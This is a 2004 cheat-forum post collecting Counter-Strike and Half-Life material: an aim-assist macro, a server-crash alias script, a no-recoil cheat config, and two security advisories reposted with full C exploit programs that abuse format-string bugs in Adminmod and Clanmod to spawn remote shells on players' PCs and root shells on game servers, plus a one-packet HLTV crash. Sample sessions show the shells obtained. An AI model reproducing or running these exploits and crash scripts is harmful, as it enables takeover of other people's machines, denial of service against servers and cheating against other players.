37x Forum  
04.02.2004, 19:50 - Post 1
*L*o*H*
Guest
Posts: n/a

Headshot script:
Code:
// ;  ________________________________  ;
// ; ´¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯` ;
// ;   HeadShot Script          v1.01   ;
// ;                                    ;
// ;      A                             ;
// ;   Work by       date: 03-03-2003   ;
// ;   NaXiMuZ       site: naximuz.tk   ;
// ;  ________________________________  ;
// ; `¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯´ ;

 echo "HeadShot Script Loaded..."

 alias x "speak fvox/blip"

 alias centerview "cl_pitchspeed 100000;+lookdown;wait;-lookdown;cl_pitchspeed 17799;+lookup;wait;-lookup"

 alias +headshot "-mlook;centerview;cl_pitchspeed 10;wait;+attack;+lookup;wait;-lookup"
 alias -headshot "-attack;+mlook"

 alias headshotOn "headshotBind;x;alias headshot headshotOff"
 alias headshotOff "defaultBind;x;alias headshot headshotOn"
 alias headshot "headshotOn"

 alias headshotBind "bind mouse1 +headshot;bind 1 fix1;bind 2 fix2;bind 3 fix3;bind 4 fix4;bind 5 fix5"
 alias defaultBind "bind mouse1 +attack;bind 1 slot1;bind 2 slot2;bind 3 slot3;bind 4 slot4;bind 5 slot5"

 alias fix1 "slot1;-headshot;bind mouse1 +headshot"
 alias fix2 "slot2;-headshot;bind mouse1 +headshot"
 alias fix3 "slot3;-attack;bind mouse1 +attack"
 alias fix4 "slot4;-attack;bind mouse1 +attack"
 alias fix5 "slot5;-attack;bind mouse1 +attack"

// ... End of File.
Server crash script:
Code:
//Myth Server Crash Script
//http://onlinecheats.suddenlaunch2.com

alias lag1 "timeleft; timeleft; timeleft; timeleft; timeleft; timeleft; timeleft; timeleft"
alias lag2 "lag1; lag1; lag1; lag1; lag1; lag1; lag1; lag1" 
alias lag3 "lag2; lag2; lag2; lag2; lag2; lag2; lag2; lag2"
alias lag4 "lag3; lag3; lag3; lag3; lag3; lag3; lag3; lag3"
alias lag5 "lag4; lag4; lag4; lag4; lag4; lag4; lag4; lag4"
alias lag6 "lag5; lag5; lag5; lag5; lag5; lag5; lag5; lag5"
alias lag7 "lag6; lag6; lag6; lag6; lag6; lag6; lag6; lag6"
alias lag8 "lag7; lag7; lag7; lag7; lag7; lag7; lag7; lag7"

bind "p" "lag8"
Adminmod bug:
Code:
Half-Life is the underlying game for the most popular online
game today, "Counter-Strike", and others.

Adminmod is a popular plugin to the half-life-server.

Overview
========

Due to a format string in the Half-Life *client*, it is
possible for an attacker who has rcon access to a game-
server that runs Adminmod, to exploit the machine of
a player that is connected to the game server.

No, even better, you can exploit ALL clients that play
on the server AT ONCE!

Note, the attacker needs to know the rcon-password.
However, it is easy to sniff since it is being transmitted
in plaintext.

Affected Versions
=================

Since there is always the latest version of Half-Life
and Counter-Strike required to play online, there is no
need to check for other affected versions; the current one
is vulnerable.

On the server-side, this bug can be exploited using
any Adminmod version.

Impact
======

High.

Details
=======

This seems to be a format string bug in the Half-Life-Client,
Adminmod has little to do with it. I found it by accident as I
blackboxed the admin_ssay and admin_psay commands.

The admin_ssay command sends a textmessage to all players.
After some calls the message eventually reaches the function
ClientPrint, which is called for every user object (i.e. every
player on the server) (util.cpp):

/* Rope's stuff */
void ClientPrint( entvars_t *client, int msg_dest, const char *msg_name,
                  const char *param1, const char *param2, const char *param3,
                  const char *param4 ) {

  if ( ClientCheck(client) == 0 ) return;

  if ( (g_msgTextMsg = GET_USER_MSG_ID(PLID, "TextMsg", 0)) == 0 ) {
    g_msgTextMsg = REG_USER_MSG( "TextMsg", -1 );
  }  // if


  MESSAGE_BEGIN( MSG_ONE, g_msgTextMsg, NULL, client );
  WRITE_BYTE( msg_dest );
  WRITE_STRING( msg_name );

  if ( param1 )
    WRITE_STRING( param1 );

  if ( param2 )
    WRITE_STRING( param2 );

  if ( param3 )
    WRITE_STRING( param3 );

  if ( param4 )
    WRITE_STRING( param4 );

  MESSAGE_END();

}

Since I am no HLSDK developer, I have no idea what those MESSAGE_BEGIN
macros do, but I suspect that the Halflife-Client simply prints out
the message that was sent by the server using a format function,
without checking for evil characters. It seems that only some kind
of custom messages trigger this problem.

However, you can force the client to execute arbitrary commands that
eventually spawn a remote shell.

Solution
========

Disable adminmod until a patched version becomes available.
Change the rcon-password.

Exploit
=======

Please find attached a demonstration exploit. Note that it will
only work against Windows 2000/XP-Clients due to the architecture
of the shellcode (the server-OS is irrelevant).  Other versions
can of course be exploited using different shellcodes.

When you execute the exploit against a victim, it will look
for him as if the game crashed (it freezes).

On the attacker side, if you don't want to exploit all clients
in one shot, you have to modify a command script of adminmod,
namely the "admin_psay" command so it doesn't send the
"(Private Msg from Admin): "-string to the client (would be
a bad thing because the IP jumps directly into that buffer).
This is left as an exercise to the reader.

Sample exploitation session
===========================

greuff@saturn:~$ ./hoagie_adminmod_client localhost 27015 myprecious greuff
Writing shellcode fragment at offset 5056...
Writing shellcode fragment at offset 4998...
Writing shellcode fragment at offset 4940...
Writing shellcode fragment at offset 4882...
Writing shellcode fragment at offset 4824...
Writing shellcode fragment at offset 4766...
Writing shellcode fragment at offset 4708...
Writing shellcode fragment at offset 4650...
Writing shellcode fragment at offset 4592...
Writing shellcode fragment at offset 4534...
Writing shellcode fragment at offset 4476...
Writing shellcode fragment at offset 4418...
Writing shellcode fragment at offset 4360...
Writing shellcode fragment at offset 4302...
Writing shellcode fragment at offset 4244...
Writing shellcode fragment at offset 4186...
Writing shellcode fragment at offset 4128...
Writing shellcode fragment at offset 4070...
Writing shellcode fragment at offset 4012...
Writing shellcode fragment at offset 3954...
Writing shellcode fragment at offset 3896...
Writing shellcode fragment at offset 3838...
Writing bootstrap at offset 3724...
Writing return into shellcode instructions...
Shell (hopefully) spawned at client host port 8008.

greuff@saturn:~$ telnet 192.168.0.2 8008
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

E:\SIERRA\COUNTE~1>exit

Discovered by
=============

greuff <greuff@void.at>

Credits
=======

void.at
everyone who was at 19c3

====================================================

/*****************************************************************
  * hoagie_adminmod_client.c
  *
  * Remote exploit for Halflife-Clients playing on a server running
  * the Adminmod plugin.
  *
  * Spawns a shell at 8008/tcp.
  *
  * Author: greuff@void.at
  *
  * Credits:
  *    void.at
  *    Taeho Oh for using parts of his shellcode-connection code.
  *    deepzone.org for their shellcode-generator
  *
  * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
  * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
  * CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
  *
  *****************************************************************/

#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>

char server_ip[20];
char rcon_pwd[30];
int server_port;
char player_nick[30];

#define STRADDR 0x19d4588

/*
-- portable NT/2k/XP ShellCode features ... www.deepzone.org

LoadLibraryA   IT address     004AC2E0h
GetProcAddress IT address     004AC164h
XOR byte                      9Fh
Remote port                   8008
Style                         C

ATTENTION code modified by greuff: 0xff in the first line
changed to 0xfe because the HL-client filters out this
character.

Wrote a short bootstrap loader that changes this byte
again to 0xff. (dec %esp, dec %esp, dec %esp, dec %esp,
pop %esi, incb 0xf(%esi))

It additionally corrects the single '%' in the code that
is filtered out by the format-string-function. (offset 0x65)

Works only when the code gets executed by a ret! (buffer-
address has to lie on the stack)

*/


void create_conn(int *sock, char *host, int port)
{
    struct sockaddr_in sin;
    sin.sin_family=AF_INET;
    sin.sin_port=htons(port);
    if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);
    if((*sock=socket(PF_INET,SOCK_DGRAM,0))<0) perror("socket"), exit(1);
}

void lowlevel_rcon(int sock, char *host, int port, char *cmd, char *reply)
{
    char msg[100000];
    struct sockaddr_in sin;
    struct sockaddr_in sfrom;
    fd_set fdset;
    int dummy;

    sin.sin_family=AF_INET;
    sin.sin_port=htons(port);
    if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);

    sprintf(msg,"%c%c%c%c%s",0xff,0xff,0xff,0xff,cmd);
    if(sendto(sock,msg,strlen(msg),0,(struct sockaddr *)&sin,sizeof(sin))<0)
       perror("sendto"), exit(1);

    if(reply)
    {
       if(recvfrom(sock,msg,2000,0,(struct sockaddr *)&sfrom,&dummy)<0)
          perror("recvfrom"), exit(1);

       if(strncmp(msg,"\xFF\xFF\xFF\xFF",4))
          fprintf(stderr,"protocol error: reply\n"), exit(1);

       strcpy(reply,msg+4);
    }
}

void send_rcon(int sock, char *host, int port, char *rconpwd, char *cmd, char *reply_fun)
{
    char reply[1000];
    char msg[100000];

    lowlevel_rcon(sock,host,port,"challenge rcon",reply);
    if(!strstr(reply,"challenge rcon "))
       fprintf(stderr,"protocol error\n"), exit(1);
    reply[strlen(reply)-1]=0;

    sprintf(msg,"rcon %s "%s" %s",reply+strlen("challenge rcon "),rconpwd,cmd);
    if(reply_fun)
       lowlevel_rcon(sock,host,port,msg,reply);
    else
       lowlevel_rcon(sock,host,port,msg,NULL);
    if(reply_fun)
       strcpy(reply_fun,reply);
}

int main(int argc, char **argv)
{
    int sock, i,j;
    int anzsc;
    char reply[1000], command[100];
    char evil_message[100000];
    unsigned int offset, spaces;
    unsigned long addr;

    printf("hoagie_adminmod_client - remote exploit for half-life-clients\n");
    printf("by greuff@void.at\n\n");
    if(argc<4 || argc>5)
    {
       printf("Usage: %s server_ip server_port rcon_password [player_nick]\n\n",argv[0]);
       exit(1);
    }

    strcpy(server_ip,argv[1]);
    server_port=strtol(argv[2],NULL,10);
    strcpy(rcon_pwd,argv[3]);
    if(argc==5)
    {
       strcpy(player_nick,argv[4]);
       sprintf(command,"admin_command admin_psay "%s"",player_nick);
    }
    else
    {
       player_nick[0]=0;
       sprintf(command,"admin_command admin_ssay");
    }

    if(player_nick[0]==0)
    {
       printf("Sending to ALL clients! You have 3 sec to abort...\n");
       sleep(3);
    }

    create_conn(&sock,server_ip,server_port);

    /********* Step 1 - send the complete shellcode and the loader to the big buffer ***********/

    offset=5000+112/2;
    spaces=0;
    for(i=21;i>=0;i--)
    {
       sprintf(evil_message,"%s ",command);
       for(j=0;j<spaces;j++)
          strcat(evil_message," ");
       sprintf(reply,"%%%du%s",offset,shellcode[i]);
       strcat(evil_message,reply);

       printf("Writing shellcode fragment at offset %d...\n",offset);
       send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);
       offset-=strlen(shellcode[i])+2;   // including \x0a\x00
    }

    /********* Step 2 - send the shellcode bootstrap loader ***********/

    /* correct offset because the shell loader has the double size of a shellcode chunk */
    offset-=strlen(shellcode[0]);
    sprintf(evil_message,"%s ",command);
    for(j=0;j<spaces;j++)
       strcat(evil_message," ");
    sprintf(reply,"%%%du%s",offset,loader);
    strcat(evil_message,reply);

    printf("Writing bootstrap at offset %d...\n",offset);
    send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);

    /********* Step 3 - construct the code that returns into the shellcode ************/

    addr=STRADDR+offset+73+spaces;
    sprintf(evil_message,"%s AA%c%c%c%c%c%c%%.f%%.f%%.f%%.f%%.f%%.%du%%n",
         command,
         0x68,addr&0xFF,(addr>>8)&0xFF,(addr>>16)&0xFF,(addr>>24)&0xFF,0xc3,734 /* 0x3cd-13
*/);
    printf("Writing return into shellcode instructions...\n");
    send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);

    close(sock);

    printf("Shell (hopefully) spawned at client host port 8008.\n");
    return 0;
}
Clanmod bug:
Code:
Clanmod[1] is a plugin for the "Half-Life Server", hosting
the most popular online game today, "Counter-Strike", among
others.

Overview
========

Due to a format string bug in clanmod, it is possible
for a remote attacker who knows the rcon-password to
remotely exploit the gameserver. Since most game-server-
admins I've seen are not very security-aware, the server
generally runs as root.

The rcon-password can be obtained using social engineering
or sniffing-techniques, since it is being transmitted
in plaintext. It is needed because the vulnerable function
can only be called via rcon.

Affected Versions
=================

All Clanmod versions on Windows and Linux.
Successfully tested with Clanmod 1.81.11 running on
hlds 3.1.1.0 on Linux.

Impact
======

High. Remote-shell and very likely remote-root.

Details
=======

This is a format string bug. Clanmod registers the command
"cm_log" to the halflife server, its purpose is to write a line
to the server log. This line is written using a printf-function
as seen in server.cpp:

2790 void CmdLogMessage()
2791 {
2792         if (CMD_ARGC() > 1) {
2793                 UTIL_FillText((char*)CMD_ARGS()/*UTIL_GetVarArgs(1,FALSE)*/, NULL, 256,cmSet.allow_to_execute,NULL,NULL,TRUE);
2794                 UTIL_LogPrintf(UTIL_VarArgs("[%s] %s",Plugin_info.logtag,  com_token));
2795         }
2796         else
2797                 PrintErrorInfo("cm_log");
2798
2799         //Close any opened gate
2800         cmSet.allow_to_execute_time = gpGlobals->time + 0.25;
2801 }

Line 2794: UTIL_LogPrintf gets called with a user-supplied string.
UTIL_LogPrintf itself calls vsnprintf with no further checks.

rcon-output:

log on
cm_log %08x.%08x.%08x.%08x

-> [CLANMOD] 00000000.bfff0001.433a9984.433a9964

Solution
========

Disable clanmod until a patched version becomes available.
Change the rcon-password.

Exploit
=======

Please find attached a demonstration exploit. Note that it will
only work against a Linux-server due to the exploitation technique.
This does NOT mean that Windows-servers are not vulnerable, they
still suffer from the same hole.

Sample exploitation session
===========================

greuff@saturn:~$ ./hoagie_clanmod localhost 27015 myprecious
hoagie_clanmod - remote exploit for hlds servers using the clanmod plugin
by greuff@void.at

Getting stackpop count....
Stackpops found: 71, Padding: 1
Writing shellcode.....
Connecting to the shell...
Connect to the shell
id
uid=0(root) gid=0(root) groups=0(root),101(lpadmin)
exit

Discovered by
=============

greuff <greuff@void.at>

Credits
=======

void.at
everyone who was at 19c3

References
==========

[1] http://www.unitedadmins.com

==================================================================

/*****************************************************************
  * hoagie_clanmod.c
  *
  * Remote exploit for Halflife-Servers running the Clanmod-Plugin
  * (rcon-password required)
  *
  * Binds a shell to port 30464/tcp and connects to it.
  *
  * Author: greuff@void.at
  *
  * Tested on HL-Server v3.1.1.0 and ClanMod 1.81.11
  *
  * Credits:
  *    void.at
  *    Taeho Oh for using parts of his shellcode-connection code.
  *
  * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
  * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
  * CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
  *
  *****************************************************************/

#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>

#define VSNPRINTF_GOT_ADDRESS 0x0804ce18
#define OFFSET 0x41414141

#define SB4(a) ((unsigned int)(a>>24))
#define SB3(a) ((unsigned int)((a>>16)&0xFF))
#define SB2(a) ((unsigned int)((a>>8)&0xFF))
#define SB1(a) ((unsigned int)(a&0XFF))

// forks and binds a shell to 30464/tcp. parent process exit()s.

char server_ip[20];
char rcon_pwd[30];
int server_port;

int exec_sh(int sockfd)
{
         char snd[4096],rcv[4096];
         fd_set rset;
         while(1)
         {
                 FD_ZERO(&rset);
                 FD_SET(fileno(stdin),&rset);
                 FD_SET(sockfd,&rset);
                 select(255,&rset,NULL,NULL,NULL);
                 if(FD_ISSET(fileno(stdin),&rset))
                 {
                         memset(snd,0,sizeof(snd));
                         fgets(snd,sizeof(snd),stdin);
                         write(sockfd,snd,strlen(snd));
                 }
                 if(FD_ISSET(sockfd,&rset))
                 {
                         memset(rcv,0,sizeof(rcv));
                         if(read(sockfd,rcv,sizeof(rcv))<=0)
                                 exit(0);
                         fputs(rcv,stdout);
                 }
         }
}

int connect_sh()
{
         int sockfd,i;
         struct sockaddr_in sin;
         printf("Connect to the shell\n");
         fflush(stdout);
         memset(&sin,0,sizeof(sin));
         sin.sin_family=AF_INET;
         sin.sin_port=htons(30464);
         if(inet_aton(server_ip,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);
         if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
         {
                 printf("Can't create socket\n");
                 exit(0);
         }
         if(connect(sockfd,(struct sockaddr *)&sin,sizeof(sin))<0)
         {
                 printf("Can't connect to the shell\n");
                 exit(0);
         }
         return sockfd;
}

void create_conn(int *sock, char *host, int port)
{
    struct sockaddr_in sin;
    struct timeval timeout;

    sin.sin_family=AF_INET;
    sin.sin_port=htons(port);
    if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);
    if((*sock=socket(PF_INET,SOCK_DGRAM,0))<0) perror("socket"), exit(1);

    timeout.tv_sec=10;
    timeout.tv_usec=0;
    if(setsockopt(*sock,SOL_SOCKET,SO_RCVTIMEO,(const void *)&timeout,
       sizeof(timeout))<0)
       perror("setsockopt"),exit(1);
    if(setsockopt(*sock,SOL_SOCKET,SO_SNDTIMEO,(const void *)&timeout,
       sizeof(timeout))<0)
       perror("setsockopt"),exit(1);
}

void lowlevel_rcon(int sock, char *host, int port, char *cmd, char *reply)
{
    char msg[2000];
    struct sockaddr_in sin;
    struct sockaddr_in sfrom;
    fd_set fdset;
    int dummy;

    usleep(100);

    sin.sin_family=AF_INET;
    sin.sin_port=htons(port);
    if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);

    sprintf(msg,"%c%c%c%c%s",0xff,0xff,0xff,0xff,cmd);
    if(sendto(sock,msg,strlen(msg),0,(struct sockaddr *)&sin,sizeof(sin))<0)
       perror("sendto"), exit(1);

    if(reply)
    {
       if(recvfrom(sock,msg,2000,0,(struct sockaddr *)&sfrom,&dummy)<0)
       {
          if(errno==EAGAIN)
          {
             // resend message
             printf("msg stalled, resending...\n");
             sprintf(msg,"%c%c%c%c%s",0xff,0xff,0xff,0xff,cmd);
             if(sendto(sock,msg,strlen(msg),0,(struct sockaddr *)&sin,sizeof(sin))<0)
                perror("sendto"), exit(1);
             else
                printf("resend OK\n");
             if(recvfrom(sock,msg,2000,0,(struct sockaddr *)&sfrom,&dummy)<0)
                perror("recvfrom"),exit(1);
          }
          else
             perror("recvfrom"), exit(1);
       }

       if(strncmp(msg,"\xFF\xFF\xFF\xFF",4))
          fprintf(stderr,"protocol error: reply\n"), exit(1);

       strcpy(reply,msg+4);
    }
}

void send_rcon(int sock, char *host, int port, char *rconpwd, char *cmd, char *reply_fun)
{
    char reply[1000];
    char msg[2000];

    lowlevel_rcon(sock,host,port,"challenge rcon",reply);
    if(!strstr(reply,"challenge rcon "))
       fprintf(stderr,"protocol error\n"), exit(1);
    reply[strlen(reply)-1]=0;

    sprintf(msg,"rcon %s "%s" %s",reply+strlen("challenge rcon "),rconpwd,cmd);
    if(reply_fun)
       lowlevel_rcon(sock,host,port,msg,reply);
    else
       lowlevel_rcon(sock,host,port,msg,NULL);
    if(reply_fun)
       strcpy(reply_fun,reply);
}

int get_padding(unsigned char c,int bytes_written)
{
    int write_byte=c;
    int already_written=bytes_written;
    int padding;

    write_byte+=0x100;
    already_written%=0x100;
    padding=(write_byte-already_written)%0x100;
    if(padding<10) padding+=0x100;

    return padding;
}

void get_write_paddings(unsigned long addr, int *p1, int *p2, int *p3,
                         int *p4, int bytes_written)
{
    // greetings to scud :-)
    int write_byte;
    int already_written;
    int padding;

    write_byte=SB1(addr);
    already_written=bytes_written;
    write_byte+=0x100;
    already_written%=0x100;
    padding=(write_byte-already_written)%0x100;
    if(padding<10) padding+=0x100;
    *p1=padding;

    write_byte=SB2(addr);
    already_written+=padding;
    write_byte+=0x100;
    already_written%=0x100;
    padding=(write_byte-already_written)%0x100;
    if(padding<10) padding+=0x100;
    *p2=padding;

    write_byte=SB3(addr);
    already_written+=padding;
    write_byte+=0x100;
    already_written%=0x100;
    padding=(write_byte-already_written)%0x100;
    if(padding<10) padding+=0x100;
    *p3=padding;

    write_byte=SB4(addr);
    already_written+=padding;
    write_byte+=0x100;
    already_written%=0x100;
    padding=(write_byte-already_written)%0x100;
    if(padding<10) padding+=0x100;
    *p4=padding;
}

int main(int argc, char **argv)
{
    int sock, stackpops, padding;
    int i,j,bytes_written;
    int p1,p2,p3,p4;
    char cmd[1000], reply[1000];
    unsigned long addr;

    printf("hoagie_clanmod - remote exploit for hlds servers using the clanmod plugin\n"
           "by greuff@void.at\n\n");
    if(argc!=4)
    {
       printf("Usage: %s server_ip server_port rcon_password\n\n",argv[0]);
       exit(1);
    }

    strcpy(server_ip,argv[1]);
    server_port=strtol(argv[2],NULL,10);
    strcpy(rcon_pwd,argv[3]);

    create_conn(&sock,server_ip,server_port);

    printf("Getting stackpop count...");
    send_rcon(sock,server_ip,server_port,rcon_pwd,"log on",reply);
    stackpops=-1;
    for(padding=0;padding<4 && stackpops==-1;padding++)
    {
       for(i=50;i<100 && stackpops==-1;i++)
       {
          strcpy(cmd,"cm_log ");
          for(j=0;j<padding;j++) strcat(cmd,"b");
          sprintf(reply,"AAAA%%%d$08x",i);
          strcat(cmd,reply);

          send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);
          reply[strlen(reply)-1]=0;
          if(strstr(reply,"AAAA41414141"))
          {
             stackpops=i;
             strcpy(cmd,strchr(reply,'['));
             bytes_written=strlen(cmd)-8;
          }
          printf(".");
          fflush(stdout);
       }
    }
    padding--;
    if(stackpops==-1)
    {
       printf("\ncouldn't determine stackpop count. (I really tried hard!)\n");
       exit(1);
    }

    printf("\nStackpops found: %d, Padding: %d\n",stackpops,padding);

    // inject shellcode
    printf("Writing shellcode...");
    addr=OFFSET;
    for(i=0;i<strlen(shellcode);)
    {
       int t;
       if((addr&0xFF)>0x75)
       {
          // leave space for jmp-instruction (5 bytes: 0xe9 offset/32)
          // distance is 0x13B-0x7A = 193d
          unsigned long target=192;

          strcpy(cmd,"cm_log ");
          for(j=0;j<padding;j++) strcat(cmd,"b");
          t=get_padding(0xe9,bytes_written);
          sprintf(reply,"%c%c%c%c%%%du%%%d$n",addr&0xFF,(addr>>8)&0xFF,
              (addr>>16)&0xFF,(addr>>24)&0xFF,t,stackpops);
          strcat(cmd,reply);
          send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);

          addr++;
          strcpy(cmd,"cm_log ");
          for(j=0;j<padding;j++) strcat(cmd,"b");
          t=get_padding(target&0xFF,bytes_written);
          sprintf(reply,"%c%c%c%c%%%du%%%d$n",addr&0xFF,(addr>>8)&0xFF,
              (addr>>16)&0xFF,(addr>>24)&0xFF,t,stackpops);
          strcat(cmd,reply);
          send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);

          addr++;
          strcpy(cmd,"cm_log ");
          for(j=0;j<padding;j++) strcat(cmd,"b");
          t=get_padding((target>>8)&0xFF,bytes_written);
          sprintf(reply,"%c%c%c%c%%%du%%%d$n",addr&0xFF,(addr>>8)&0xFF,
              (addr>>16)&0xFF,(addr>>24)&0xFF,t,stackpops);
          strcat(cmd,reply);
          send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);

          addr++;
          strcpy(cmd,"cm_log ");
          for(j=0;j<padding;j++) strcat(cmd,"b");
          t=get_padding((target>>16)&0xFF,bytes_written);
          sprintf(reply,"%c%c%c%c%%%du%%%d$n",addr&0xFF,(addr>>8)&0xFF,
              (addr>>16)&0xFF,(addr>>24)&0xFF,t,stackpops);
          strcat(cmd,reply);
          send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);

          addr++;
          strcpy(cmd,"cm_log ");
          for(j=0;j<padding;j++) strcat(cmd,"b");
          t=get_padding((target>>24)&0xFF,bytes_written);
          sprintf(reply,"%c%c%c%c%%%du%%%d$n",addr&0xFF,(addr>>8)&0xFF,
              (addr>>16)&0xFF,(addr>>24)&0xFF,t,stackpops);
          strcat(cmd,reply);
          send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);

          addr+=193;
       }
       else
       {
          // write shellcode-pieces
          strcpy(cmd,"cm_log ");
          for(j=0;j<padding;j++) strcat(cmd,"b");
          t=get_padding(shellcode[i],bytes_written);
          sprintf(reply,"%c%c%c%c%%%du%%%d$n",addr&0xFF,(addr>>8)&0xFF,
              (addr>>16)&0xFF,(addr>>24)&0xFF,t,stackpops);
          strcat(cmd,reply);
          send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,reply);
          addr++;
          i++;
       }
       printf(".");
       fflush(stdout);
    }

    // overwrite GOT entry with shellcode address
    strcpy(cmd,"cm_log ");
    for(j=0;j<padding;j++) strcat(cmd,"b");
    get_write_paddings(OFFSET,&p1,&p2,&p3,&p4,bytes_written+28);
    addr=VSNPRINTF_GOT_ADDRESS;
    sprintf(reply,"%c%c%c%cAAAA%c%c%c%cAAAA%c%c%c%cAAAA%c%c%c%cAAAA"
                  "%%%du%%%d$n%%%du%%%d$n%%%du%%%d$n%%%du%%%d$n",
                  addr&0xFF,(addr>>8)&0xFF,(addr>>16)&0xFF,(addr>>24)&0xFF,
                  (addr+1)&0xFF,((addr+1)>>8)&0xFF,((addr+1)>>16)&0xFF,((addr+1)>>24)&0xFF,
                  (addr+2)&0xFF,((addr+2)>>8)&0xFF,((addr+2)>>16)&0xFF,((addr+2)>>24)&0xFF,
                  (addr+3)&0xFF,((addr+3)>>8)&0xFF,((addr+3)>>16)&0xFF,((addr+3)>>24)&0xFF,
                  p1,stackpops,p2,stackpops+2,p3,stackpops+4,p4,stackpops+6);
    strcat(cmd,reply);
    send_rcon(sock,server_ip,server_port,rcon_pwd,cmd,NULL);
    sleep(1);
    close(sock);
    printf("\nConnecting to the shell...\n");
    exec_sh(connect_sh());
    return 0;
}
Hltvbug:
Code:
HLTV offers the ability to have thousands of spectators watch
online games on Half-Life-servers.

Overview
========

By sending a specially crafted packet to the hltv-server,
an attacker can cause the server to crash.

Affected Versions
=================

The one that comes with hlds 3.1.1.0; possibly others.

Impact
======

Medium. The remote server simply crashes.

Details
=======

Packets querying things like player-status etc always start
with \xff\xff\xff\xff, followed by a query command and terminated
by a \0.

When you simply send \xff\xff\xff\xff\0 to the server, it crashes.

Solution
========

Vendor patch needed!

Exploit
=======

Come on :-)

Discovered by
=============

greuff <greuff@void.at>

Credits
=======

void.at
everyone who was at 19c3

Shieldscript:
Create Commandmenu.txt:
Code:
" " "Shieldscript by d0ne" "say_team Shieldscript -> mpcheatz.com | unknowncheats.de"
"1" "Norecoil (Pistols)"
{
    "1" "9x19mm Sidearm" "bind mouse1 +attgl"
    "2" "KM .45 Tactical" "bind mouse1 +attusp"
    "3" "228 Compact" "bind mouse1 +att228"
    "4" "Night Hawk .50C" "bind mouse1 +attdea"
    "5" "ES Five-Seven" "bind mouse1 +attfive"
    "6" "Unbind" "bind mouse1 +attack"
}
"2" "Shieldbug 1"
{
    "1" "Shield kaufen" "buy_shield"
    "2" "Bug mit..."
    {
    "1" "9x19mm" "shieldbugglock"
    "2" "KM .45" "shieldbugusp"
    "3" "228" "shieldbug228"
    "4" "Night Hawk" "shieldbugdea"
    "5" "Five-Seven" "shieldbugfive"
    }
}
"3" "Shieldbug 2"
{
    "1" "Aktivieren" "bind mouse1 +shieldbug2"
}
Create sensitivity.cfg:
Code:
alias -ssens "sensitivity 4.1"
Create userconfig.cfg:
Code:
exec sensitivity.cfg

// shieldscript v1.0 by d0ne'

alias ms1 "menuselect 1"
alias ms2 "menuselect 2"
alias ms3 "menuselect 3"
alias ms4 "menuselect 4"
alias ms5 "menuselect 5"
alias ms6 "menuselect 6"
alias ms7 "menuselect 7"
alias ms8 "menuselect 8"
alias ms9 "menuselect 9"
alias ms0 "slot10; wa2; slot10; slot10; wa2; slot10; slot10; wa2; slot10; slot10; wa2; slot10"

alias wa "wait"
alias wa2 "wa; wa"
alias wa3 "wa; wa2"
alias wa4 "wa2; wa2"
alias wa8 "wa4; wa4"

alias +ssens "sensitivity 1.9"

alias buy_sec "buyammo2; buyammo2; buyammo2; buyammo2; buyammo2; buyammo2; buyammo2; buyammo2; buyammo2"
alias buy_shield "buyequip; ms8; weapon_knife; say_team shield'; wa2; ms0"

alias shieldbugglock "+attack2; wa; -attack2; wa8; buy; wa; ms1; wa; ms1; wa; buy_sec"
alias shieldbugusp "+attack2; wa; -attack2; wa8; buy; wa; ms1; wa; ms2; wa; buy_sec"
alias shieldbug228 "+attack2; wa; -attack2; wa8; buy; wa; ms1; wa; ms3; wa; buy_sec"
alias shieldbugdea "+attack2; wa; -attack2; wa8; buy; wa; ms1; wa; ms4; wa; buy_sec"
alias shieldbugfive "+attack2; wa; -attack2; wa8; buy; wa; ms1; wa; ms5; wa; buy_sec"

alias +attgl "+ssens; wa; +speed; wa; cl_pitchspeed 0.3; +lookdown; wa; +attack"
alias -attgl "-ssens; wa; -speed; wa; cl_pitchspeed 0.3; -lookdown; wa; -attack"

alias +attusp "+ssens; wa; +speed; wa; cl_pitchspeed 1.4; +lookdown; wa; +attack"
alias -attusp "-ssens; wa; -speed; wa; cl_pitchspeed 1.4; -lookdown; wa; -attack"

alias +att228 "+ssens; wa; +speed; wa; cl_pitchspeed 1.0; +lookdown; wa; +attack"
alias -att228 "-ssens; wa; -speed; wa; cl_pitchspeed 1.0; -lookdown; wa; -attack"

alias +attdea "+ssens; wa; +speed; wa; cl_pitchspeed 3.9; +lookdown; wa; +attack"
alias -attdea "-ssens; wa; -speed; wa; cl_pitchspeed 3.9; -lookdown; wa; -attack"

alias +attfive "+ssens; wa; +speed; wa; cl_pitchspeed 0.6; +lookdown; wa; +attack"
